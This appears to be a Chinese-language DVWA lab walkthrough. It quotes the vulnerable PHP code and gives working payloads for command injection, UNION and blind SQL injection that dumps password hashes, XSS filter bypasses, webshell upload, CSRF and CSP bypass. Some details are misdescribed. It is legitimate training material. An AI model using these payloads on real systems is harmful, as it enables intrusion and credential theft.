DVWA靶场
下载字典
【字典合集】SecLists-更全面的渗透测试字典 v2024.4 - 极核GetShell
1.Brute Force(暴力(破解))
1.1Low等级
1.登陆界面,随便在用户名和密码框输入东西
2.用bp抓包,点击login进行拦截
3.打开Intruder
4.设置成集群炸弹攻击
5.设置payload
6.点击攻击
、
点击长度,可以发现有一个值与其他长度值不相近,说明攻击成功,这个就是正确的用户名和密码
可以看出攻击成功!
1.2Medium等级
Medium等级 和low等级一样,就是源码多了一些过滤和时间等待,low等级能跑出来的字典,medium等级照样可以跑出来,延长爆破时间,但是不影响最后结果
1.3Height等级
随意输入用户名密码,抓个包可以看到,携带了token
完成
2.Command Injection(命令行注入)
2.1Low等级
1.看题目,让我们输入ip地址,也就是输入本机地址
2.输入本机地址127.0.0.1,点击submit,查看返回的数据
发现都是乱码,是因为编码格式不同,后续可以改一下编码格式,可以看出来回显的文字格式和在cmd中执行的ping指令相似
3.解决编码格式问题
打开文件,按住ctrl+f,找到utf-8,然后将编码改成GBK即可
按ctrl+s保存,然后刷新页面,就可以看到正常回显页面了
4.分析源码
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
$html .= "<pre>{$cmd}</pre>";
}
?>shell_exec函数是执行系统指令,后面是执行ping指令,其他就没有关键信息了,说明只让我们执行ping指令,那么就可以试一试在ping指令后面添加其他指令,实现命令行注入
那么就要设计到命令连接符
a && b :代表首先执行前者命令a再执行后命令b,但是前提条件是命令a执行正确才会执行命令b,在a执行失败的情况下不会执行b命令。(前面的命令执行成功后,它后面的命令才被执行)
a & b:代表首先执行命令a再执行命令b,如果a执行失败,还是会继续执行命令b。也就是说命令b的执行不会受到命令a的干扰。(表示简单的拼接,A命令语句和B命令语句没有制约关系)
a || b:代表首先执行a命令再执行b命令,如果a命令执行成功,就不会执行b命令,相反,如果a命令执行不成功,就会执行b命令。(前面的命令执行失败,它后面的命令才被执行)
a | b:代表首先执行a命令,再执行b命令,不管a命令成功与否,都会去执行b命令。(当第一条命令失败时,它仍然会执行第二条命令,表示A命令语句的输出,作为b命令语句的输入执行。)
所以我们选择“|” 连接符
以上指令除ping都可以
结果显示成功!
2.2Medium等级
1.分析源码
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = $_REQUEST[ 'ip' ];
// Set blacklist
$substitutions = array(
'&&' => '',
';' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
$html .= "<pre>{$cmd}</pre>";
}
?>
发现过滤&&字符和;字符
说明不影响别的字符,我们还可以用|字符
2. 输入指令
127.0.0.1|ipconfig
成功
2.3Height等级
1.分析源码
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = trim($_REQUEST[ 'ip' ]);
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
$html .= "<pre>{$cmd}</pre>";
}
?>
乍一看,发现几乎都过滤掉了,仔细一看,|符号后面有空格,说明过滤的是"| " 这样的字符,没哟过滤单纯的|
2.输入指令
127.0.0.1|ipconfig
成功
3.CSRF(跨站请求伪造)
3.1 low等级
分析源代码
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
$html .= "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
$html .= "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
可以看出来,没有任何过滤条件,只要满足新密码和确认密码相同即可
3.2 medium等级
先分析源码
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
$html .= "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
$html .= "<pre>Passwords did not match.</pre>";
}
}
else {
// Didn't come from a trusted source
$html .= "<pre>That request didn't look correct.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>可以发现,medium等级的源码多了一条if语句,就是stripos函数判断referer头和 当前页面的ip地址是否相同
那我们的解题思路就是让原网站的ip和攻击网站的ip相同即可
1.用bp抓包原网站
原网站url:http://dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#
这是原网站的referer头
2.将原网站的url复制下来,用新页面打开
发现不能改,就说明新打开的网站ip不一样
3.用bp抓包新网站
发现压根没有referer值,那么就简单了,直接将原网站的referer值复制到这个里面就可以了
修改成功!
3.3Height等级
可以看到,设置了token
这里我们采用抓包,把包发到重放模块,在row中可以看到新的token
发送请求后,查看新token值
构造新url用新tokenhttp://dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change&user_token=1bc9a8bf9e01fd401a8c8f0e74d69002
4.File Inclusion(文件包含)
4.1Low等级
1.分析代码
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
发现只有get传参,那么我们就可以把恶意文件上传即可
2.在这个路径添加一个php文件
一句话木马
<?php
@eval(phpinfo());
?>3.get传参,传这个文件
点击上传
上传成功!
4.2Medium等级
1.分析源码
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
get传参,把http://替换成https://
把../替换成..\
但是我们page传参可以传本地文件地址,把恶意文件放在该网站同一路径下即可,也可以成功上传
4.3Height等级
1.分析源码
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
fnmatch() 函数根据指定的模式来匹配文件名或字符串。
源码中限制了文件名来防止恶意文件包含,并且!fnmatch( “file*”, $file )代码使用了fnmatch函数检查page参数,要求page参数的开头必须是file,服务器才会去包含相应的文件,这样就无法进行远程访问。
注意:file://后面一定是绝对路径。
成功!
5.File Upload(文件上传)
5.1Low等级
1.分析源码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
发现没有任何过滤
直接上传php文件
上传成功
2.用中国蚁剑测试连接
连接成功!
5.2Medium等级
1.分析源码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
分析可知,文件类型必须是image/jpeg类型,且大小不超过100000,那就不能直接上传php文件,我们可以将文件改成image/jpeg格式,然后bp抓包,将文件再改回php,即可上传
2.改后缀,抓包
3.蚁剑测试连接
成功
5.3Height等级
1.分析源码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>分析代码可以知道,比中等级多了一个判断条件
可以看到这里又添加了一个getimagesize(string filename)函数,它会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。这里读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”.jpg”、”.jpeg” 、”.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。且文件大小小于100000字节。
所以我们就需要用记事本打开png文件,在文件末尾添加一句话木马
2.添加木马
3.上传
6.insecure captcha 不安全的验证
6.1Low等级
1.查看源码
<?php
if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
// Hide the CAPTCHA form
$hide_form = true;
// Get input
$pass_new = $_POST[ 'password_new' ];
$pass_conf = $_POST[ 'password_conf' ];
// Check CAPTCHA from 3rd party
$resp = recaptcha_check_answer(
$_DVWA[ 'recaptcha_private_key'],
$_POST['g-recaptcha-response']
);
// Did the CAPTCHA fail?
if( !$resp ) {
// What happens when the CAPTCHA was entered incorrectly
$html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
$hide_form = false;
return;
}
else {
// CAPTCHA was correct. Do both new passwords match?
if( $pass_new == $pass_conf ) {
// Show next stage for the user
$html .= "
<pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
<form action=\"#\" method=\"POST\">
<input type=\"hidden\" name=\"step\" value=\"2\" />
<input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
<input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
<input type=\"submit\" name=\"Change\" value=\"Change\" />
</form>";
}
else {
// Both new passwords do not match.
$html .= "<pre>Both passwords must match.</pre>";
$hide_form = false;
}
}
}
if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
// Hide the CAPTCHA form
$hide_form = true;
// Get input
$pass_new = $_POST[ 'password_new' ];
$pass_conf = $_POST[ 'password_conf' ];
// Check to see if both password match
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the end user
$html .= "<pre>Password Changed.</pre>";
}
else {
// Issue with the passwords matching
$html .= "<pre>Passwords did not match.</pre>";
$hide_form = false;
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
修改密码分成了两步,也就是step=1和step=2,分析代码可知,step=1是检查用户输入的验证码,验证通过后进行第二步,第二步post传参,完成修改密码
代码及能通过change和step的参数来判断验证码是否正确,这样就可以通过抓包来手动改变step参数的值
2.bp抓包
修改成功
6.2Medium等级
1.分析源码
<?php
if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
// Hide the CAPTCHA form
$hide_form = true;
// Get input
$pass_new = $_POST[ 'password_new' ];
$pass_conf = $_POST[ 'password_conf' ];
// Check CAPTCHA from 3rd party
$resp = recaptcha_check_answer(
$_DVWA[ 'recaptcha_private_key' ],
$_POST['g-recaptcha-response']
);
// Did the CAPTCHA fail?
if( !$resp ) {
// What happens when the CAPTCHA was entered incorrectly
$html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
$hide_form = false;
return;
}
else {
// CAPTCHA was correct. Do both new passwords match?
if( $pass_new == $pass_conf ) {
// Show next stage for the user
$html .= "
<pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
<form action=\"#\" method=\"POST\">
<input type=\"hidden\" name=\"step\" value=\"2\" />
<input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
<input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
<input type=\"hidden\" name=\"passed_captcha\" value=\"true\" />
<input type=\"submit\" name=\"Change\" value=\"Change\" />
</form>";
}
else {
// Both new passwords do not match.
$html .= "<pre>Both passwords must match.</pre>";
$hide_form = false;
}
}
}
if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
// Hide the CAPTCHA form
$hide_form = true;
// Get input
$pass_new = $_POST[ 'password_new' ];
$pass_conf = $_POST[ 'password_conf' ];
// Check to see if they did stage 1
if( !$_POST[ 'passed_captcha' ] ) {
$html .= "<pre><br />You have not passed the CAPTCHA.</pre>";
$hide_form = false;
return;
}
// Check to see if both password match
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the end user
$html .= "<pre>Password Changed.</pre>";
}
else {
// Issue with the passwords matching
$html .= "<pre>Passwords did not match.</pre>";
$hide_form = false;
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
依旧是抓包改值,将step的值改为2,添加passed_captcha=true,即可绕过验证
2.抓包
成功!
6.3Height等级
1.分析代码
<?php
if( isset( $_POST[ 'Change' ] ) ) {
// Hide the CAPTCHA form
$hide_form = true;
// Get input
$pass_new = $_POST[ 'password_new' ];
$pass_conf = $_POST[ 'password_conf' ];
// Check CAPTCHA from 3rd party
$resp = recaptcha_check_answer(
$_DVWA[ 'recaptcha_private_key' ],
$_POST['g-recaptcha-response']
);
if (
$resp ||
(
$_POST[ 'g-recaptcha-response' ] == 'hidd3n_valu3'
&& $_SERVER[ 'HTTP_USER_AGENT' ] == 'reCAPTCHA'
)
){
// CAPTCHA was correct. Do both new passwords match?
if ($pass_new == $pass_conf) {
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for user
$html .= "<pre>Password Changed.</pre>";
} else {
// Ops. Password mismatch
$html .= "<pre>Both passwords must match.</pre>";
$hide_form = false;
}
} else {
// What happens when the CAPTCHA was entered incorrectly
$html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
$hide_form = false;
return;
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
// Generate Anti-CSRF token
generateSessionToken();
?>
分析可知,这个就没有分步判断,就是判断 g-recaptcha-response且HTTP_USER_AGENT是否为指定值通过验证。
那么我们就可以抓包来改变它们的值,改成指定值
2.抓包改值
成功
7.SQL Injection(SQL注入)
7.1Low等级
1.判断有没有注入点,直接在输入框中输入1,观察页面是否有变化,要是有变化就证明有注入点
2.判断是字符型还是数字型,输入1=2,观察页面变化
发现没有变化,说明是字符型
3.判断闭合方式,在1后面加上英文单引号,观察页面变化,(也可以分析源码来判断闭合方式)
之后再加#号注释掉,发现没有报错了
说明闭合方式就是单引号
4.用order by判断字段数,观察页面变化
输入1'order by 3#
发现报错,我们改为1'order by 2#试一试
页面正常,说明字段数是2
5.用union联合注入来查询回显位置
输入1' union select 1,2 #
1和2都可以正常回显
查询数据库名和版本号
1' union select database(),version() #
6.获取dvwa库的所有表名
输入
1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() #
7.查询users表,也就是查询user表里面的字段
输入
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema=database() #
发现有user和password
8.查询user和password字段里面的值
输入
1' union select user,password from users #
密码通过md5加密,可以使用在线网站进行解密
7.2Medium等级
1.分析
打开发现不能输入了,只能选择,那我们可以抓包进行对id的操作,也就等同于在输入框输入东西进行get传参了
2.抓包
①判断类型
输入
1'and1=2
页面有报错,说明是数字型,数字型就没有闭合方式,所以就不用判断闭合方式了
②判断字段数
输入
1 order by 2#
字段数为2
③union联合注入,判断回显位置,然后查询库名,版本
输入
1 union select 1,2#
输入
1 union select database(),version()#
④查询表名,表名,字段名,字段值,步骤和上面一样
7.3Height等级
1.判断类型
没报错,说明是字符型
2.判断闭合方式
闭合方式是单引号
3.判断字段数
两个字段
4.union联合注入,判断回显位置,查询库名和版本号
5.查询表名,表名,字段名,字段值,步骤和上面一样
8.SQL Injection(Blind)(SQL盲注)
8.1Low等级
1.和普通注入一样,先判断注入点和类型
输入
1' and 1=1 #
观察页面变化
正常执行,说明存在sql注入,并且是字符型
盲注考虑到布尔盲注和事件盲注等,观察页面,返回的是存在和不存在,说明是布尔盲注
2.判断数据库名长度,原先我们已经知道库名是dvwa,长度是4,所以就直接猜想为4
输入
1' and length(database())=4 #
观察页面变化
返回exists(也就是true)
3.用ASCII值来判断库名,需要ascii对照表,网上可以查找
输入,判断dvwa,第一个字母是d,所以是100,以此类推
1' and ascii(substr(database(),1,1))=100 #
4.获取表名,获取字段,获取字段值
输入
1' and ascii(substr(x,1,1))=y #
x是输入查询的语句,和上一关一样
y是ascii值,需要一步步查看
8.2Mediu等级
1.分析
只能选择,不能输入,则抓包改id
2.抓包
①判断库名长度
输入
1 and length(database())=4 #
长度是四
②获取库名,表名,字段名,字段值,和上面一样
8.3Height等级
1.判断类型
没有报错,字符型
2.布尔盲注,判断闭合方式,判断库名长度
输入
1' and length(database())=4 #
长度是4
3.判断库名,表名,字段名,字段值,和上面一样
9.XSS(DOM)
9.1Low等级
1.观察url,发现下面的值和url是一样的,说明get传参就可以传一些恶意指令
2.get传参,传恶意指令
输入
<script>alert(1)</script>
9.2Medium等级
1.分析源码
<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
$default = $_GET['default'];
# Do not allow script tags
if (stripos ($default, "<script") !== false) {
header ("location: ?default=English");
exit;
}
}
?>
发现不能使用script标签,还可以使用img标签
2,查看前端代码,观察get传参的值,放在了哪里
要想插入恶意指令,就必须提前闭合传入值的标签,来执行恶意指令
所以闭合select标签
get传参
</select><img src=1 οnerrοr=alert(1)>
9.3Height等级
1.分析代码
<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
# White list the allowable languages
switch ($_GET['default']) {
case "French":
case "English":
case "German":
case "Spanish":
# ok
break;
default:
header ("location: ?default=English");
exit;
}
}
?>
此处使用了白名单过滤,只允许传的 default值为 French English German Spanish 其中一个。
只能找方法绕过服务器端的处理,直接在本地运行构造的语句,可以过“#”来注释掉后面的内容,因为URL栏中的“#”之后的内容不会被发送到服务器当中去,不会经过JS的过滤,只在客户端显示
2.get传参
输入
#<script>alert(1)</script>
10. XSS(reflected)反射
10.1Low等级
直接在输入框输入<script>alert(1)</script>
10.2Medium等级
1.分析代码
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = str_replace( '<script>', '', $_GET[ 'name' ] );
// Feedback for end user
$html .= "<pre>Hello ${name}</pre>";
}
?>
发现只过滤了script标签,没有过滤其他标签,和没有过滤大小写和双写
2.get传参,大小写过滤
输入
<sCript>alert(1)</sCript>
成功
10.3Height等级
1.分析代码
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
// Feedback for end user
$html .= "<pre>Hello ${name}</pre>";
}
?>
发现过滤<script>标签,使用了正则表达式直接把 <*s*c*r*i*p*t 给过滤了,* 代表一个或多个任意字符,i 代表不区分大小写。所以<script>标签在这里就不能用了,大小写和双写也不能用,但可以通过img、body,a等标签的事件或者iframe等标签的src注入恶意的js代码。
2.get传参
输入
<img src=1 onerror='alert("1")'>
11. XSS(stored)存储型
11.1Low等级
在留言框输入<script>alert(1)</script>
11.2Medium等级
1.分析代码
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
name把script标签过滤,那么我们还可以用大小写
2.先改前端代码,将name文本框字符求长度改为100
3.在name出输入指令
输入
<scripT>alert(1)</sCript>
11.3Height等级
1.分析代码
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
发现过滤<script>标签,使用了正则表达式直接把 <*s*c*r*i*p*t 给过滤了,* 代表一个或多个任意字符,i 代表不区分大小写。所以<script>标签在这里就不能用了,大小写和双写也不能用,但可以通过img、body,a等标签的事件或者iframe等标签的src注入恶意的js代码。
2.get传参
输入
<img src=1 οnerrοr='alert("1")'>
12.CSP bypass 内容安全策略
1.分析源代码
$headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;"; // allows js from self, pastebin.com, hastebin.com, jquery and google analytics.从这句话就可以看出来,可以从外部指定网站被执行恶意指令
https://pastebin.com
hastebin.com
example.com
code.jquery.com
https://ssl.google-analytics.com
2.就选择第一个网站,进入该网站
在new paste中编写代码
点击create
点击raw
复制url
将复制下来的url输入即可完成
13. JavaScript Attacks
1.分析源码重要部分
<script>
function rot13(inp) {
return inp.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);});
}
function generate_token() {
var phrase = document.getElementById("phrase").value;
document.getElementById("token").value = md5(rot13(phrase));
}
generate_token();
</script>
发现token值是有md5和rot13双重加密,那就将success加密
通过控制台终端直接拿到加密值
md5(rot13("success"));
38581812b435834ebf84ebcc2c6424d6
2.用bp抓包改token值
